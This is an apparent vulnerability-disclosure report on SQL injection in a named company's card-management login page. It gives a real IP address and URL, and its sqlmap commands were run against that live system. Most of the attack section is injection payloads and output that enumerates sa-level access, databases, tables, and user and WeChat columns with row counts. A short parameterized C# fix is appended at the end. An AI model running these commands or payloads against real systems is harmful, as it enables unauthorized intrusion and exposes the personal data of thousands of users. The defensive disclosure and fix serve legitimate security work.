2015-09-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-10-21: The vendor has actively ignored the vulnerability; details disclosed to the public.
Jingbo Holdings (京博控股) all-in-one card integrated management platform SQL injection: WeChat, email, username, password and other information of more than 10,000 users leaked (sa privileges)
Login page of the Jingbo Holdings all-in-one card integrated management platform:
URL: http://222.134.52.40:80/admin/sys/login.aspx
Testing with sqlmap:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --current-user --current-db --is-dba --users --passwords --threads=10
Result: sa privileges:
---
Parameter: cLoginName (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';IF(5456=5456) SELECT 5456 ELSE DROP FUNCTION VJSu--&cPassword=&cLoginImage.x=1&cLoginImage.y=1

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug';WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: __VIEWSTATE=/wEPDwULLTE4MjU0NTM0NjcPFgIeCVJldHVyblVybAUNbWFpbmZyYW1lLmh0bWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2NMb2dpbkltYWdlOZ7lWtbR9HHFDQObbjkZ09Hs9mM=&__EVENTVALIDATION=/wEWBAKupKyGCgLcmtX1BwKS6+/wDAKFr8OlB1TFYJlcUXX/2Jt52Ilt6YjMgE6J&cLoginName=rlug' WAITFOR DELAY '0:0:5'--&cPassword=&cLoginImage.x=1&cLoginImage.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current database: 'yktdb_jingbo'
current user is DBA: True
database management system users [6]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] cl
[*] jbgx
[*] lzh
[*] sa
Continuing the test:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --dbs
Result:
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] scm_main
[*] tempdb
[*] yktdb_jingbo
[*] ZYTK35
Selecting yktdb_jingbo for testing:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent -D yktdb_jingbo --tables --threads=10
Database: yktdb_jingbo
[121 tables]
+---------------------------+
| EMPInfo                   |
| KQ_DevInfo                |
| KQ_MonthlyReport          |
| KQ_MonthlyReport_His      |
| KQ_NoPerson               |
| KQ_QJState                |
| KQ_QJTypeLiuCheng         |
| KQ_RECORD150513           |
| KQ_Record                 |
| KQ_Record0513bak          |
| KQ_Record_His             |
| KQ_State                  |
| KQ_Sys_BC                 |
| KQ_UserXJ                 |
| KQ_User_QJ                |
| KQ_User_QJLCRecord        |
| KqPdMonth_log             |
| Middle_DptChange          |
| Middle_DropEmply          |
| Middle_Emply              |
| Middle_EmplyChange        |
| Middle_KQ_MonthlyReport   |
| Middle_NewEmply           |
| Notice                    |
| PersonLog                 |
| TR_SB_Record              |
| TR_VW_EmpPhoto            |
| TR_VW_GetAccStatus        |
| TR_VW_KqRecord            |
| TR_VW_PaymentBooks        |
| TR_VW_PaymentBooksALL     |
| TR_VW_PaymentBooks_his    |
| TSYS_COMPANY              |
| TSYS_DEPART               |
| TSYS_Dic                  |
| TSYS_MODULE               |
| TSYS_MODULEPOPEDOM        |
| TSYS_POPEDOM              |
| TSYS_PointLogin           |
| TSYS_ROLE                 |
| TSYS_ROLEPOPEDOM          |
| TSYS_SYSTEMLOG            |
| TSYS_USER                 |
| TSYS_USERPOPEDOM          |
| Temp_DKRecord             |
| Temp_KQRecord             |
| Tr_position               |
| User_QX                   |
| View_EmplyPhoto           |
| View_KQYearReport         |
| View_MonthlyRecordT       |
| View_MonthlyRecordT_his   |
| View_QJSPLC               |
| View_QJSPStep             |
| View_QJType               |
| View_Record               |
| View_RecordBC             |
| View_RecordJB             |
| View_RecordT              |
| View_RecordT_His          |
| View_Station              |
| View_UserBaseInfo         |
| View_UserQJ               |
| View_st                   |
| XF_DevInfo                |
| ac_dict_AccDep            |
| ac_dict_Accounts          |
| dtproperties              |
| erp_dptandperson          |
| id_accountdepbak          |
| id_accountsinfobak        |
| kq_Code                   |
| kq_Define                 |
| kq_HolidayType            |
| kq_Serial                 |
| kq_dkrecord               |
| kq_hbsq                   |
| kq_holiday                |
| kq_qj                     |
| kq_serialbak              |
| kq_tbsq                   |
| kq_tbsq_new               |
| kq_tbsqlc                 |
| kq_userqjlc               |
| kq_weekday                |
| kq_ycsq                   |
| mt_baseinfo               |
| mt_dev                    |
| mt_dkrecord               |
| mt_kqdev                  |
| mt_person                 |
| notice_viewer             |
| pb_Duty                   |
| pb_EmployeeType           |
| pb_EmplyOther             |
| pb_depart                 |
| pb_emply                  |
| sysdiagrams               |
| temp1                     |
| temp_correct              |
| temp_log                  |
| temp_userinfo             |
| tempmj                    |
| tempmonth                 |
| tempqj                    |
| tmpkqjl                   |
| tmpkqjlsl                 |
| tr_vw_GetDKInfo           |
| tr_vw_GetKqDevInfo        |
| tr_vw_GetKqDevInfoByMonth |
| tr_vw_GetXfDevInfo        |
| tr_vw_MonAccounts         |
| user_dqj                  |
| user_duty                 |
| user_dyb                  |
| user_gsremark             |
| view_qjtj                 |
| weixin                    |
| weixin_bf                 |
+---------------------------+
Saw a weixin (WeChat) table, so of course I scanned it ~~
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin --column
Database: yktdb_jingbo
Table: weixin
[4 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| cardnum  | varchar |
| userid   | int     |
| userkey  | varchar |
| username | varchar |
+----------+---------+
Going deeper:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T weixin -C userid --count
Database: yktdb_jingbo
+------------+---------+
| Table      | Entries |
+------------+---------+
| dbo.weixin | 11426   |
+------------+---------+
Trying other tables:
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER --column
Database: yktdb_jingbo
Table: TSYS_USER
[20 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| COMPANYID     | int      |
| DEFAULTMODULE | int      |
| DEPARTID      | int      |
| EID           | varchar  |
| EMAIL         | varchar  |
| ENDDATE       | datetime |
| ILOCK         | char     |
| IONLINE       | int      |
| LOGINNAME     | varchar  |
| LOGINPASS     | varchar  |
| MPHONE        | varchar  |
| OPHONE        | varchar  |
| QYID          | varchar  |
| QYNAME        | varchar  |
| ROLEID        | int      |
| STARTDATE     | datetime |
| USERCODE      | varchar  |
| USERID        | int      |
| USERNAME      | varchar  |
| USERSIGN      | char     |
+---------------+----------+
sqlmap.py -u "http://222.134.52.40:80/admin/sys/login.aspx" --form --random-agent --threads=10 -D yktdb_jingbo -T TSYS_USER -C USERID --count
Database: yktdb_jingbo
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.TSYS_USER | 14325   |
+---------------+---------+
Aaargh, 14325!!! I can't scan any further......
Fix: add input filtering.
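As an added illustration of the fix (example code, not the platform's own), the login lookup written with a parameterized ADO.NET query, so that the cLoginName value can no longer terminate the statement and stack commands the way the payloads above do. It uses the TSYS_USER column names enumerated above; the connection string, the ykt_web login and the stored password format are assumptions.

```csharp
// Added example, not the platform's own code: parameterized ADO.NET login lookup
// for the cLoginName/cPassword form. Column names come from the TSYS_USER listing
// above; the connection string, the 'ykt_web' login and the stored-hash format
// are assumptions (targets .NET 5+ for SHA256.HashData / Convert.FromHexString).
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;
using System.Text;

public static class LoginService
{
    // Least privilege: the web tier uses a dedicated login with SELECT on TSYS_USER
    // only, never 'sa' (placeholder credentials, assumed).
    private const string ConnStr =
        "Server=.;Database=yktdb_jingbo;User Id=ykt_web;Password=<placeholder>;";

    // Returns the USERID on success, null otherwise. The login name is bound as a
    // typed parameter, so input such as  x';WAITFOR DELAY '0:0:5'--  is compared
    // literally against LOGINNAME rather than executed as part of the statement.
    public static int? Authenticate(string loginName, string password)
    {
        if (string.IsNullOrEmpty(loginName) || string.IsNullOrEmpty(password)
            || loginName.Length > 50)
            return null;

        const string sql =
            "SELECT USERID, LOGINPASS FROM TSYS_USER WHERE LOGINNAME = @login";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@login", SqlDbType.VarChar, 50).Value = loginName;
            conn.Open();
            using (SqlDataReader rd = cmd.ExecuteReader(CommandBehavior.SingleRow))
            {
                if (!rd.Read()) return null;
                int userId = rd.GetInt32(0);
                // Assumed: LOGINPASS holds a hex SHA-256 digest. A salted, slow KDF
                // (e.g. PBKDF2) is the better choice; SHA-256 keeps the example short.
                byte[] expected = Convert.FromHexString(rd.GetString(1));
                byte[] actual = SHA256.HashData(Encoding.UTF8.GetBytes(password));
                // Constant-time comparison avoids leaking the matched-prefix length.
                return CryptographicOperations.FixedTimeEquals(actual, expected)
                    ? userId : (int?)null;
            }
        }
    }
}
```

Filtering the form fields alone would not have been enough here: the application also ran as sa, so any surviving injection reaches the whole instance, which is why the example pairs parameterization with a dedicated low-privilege login.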
Could not contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)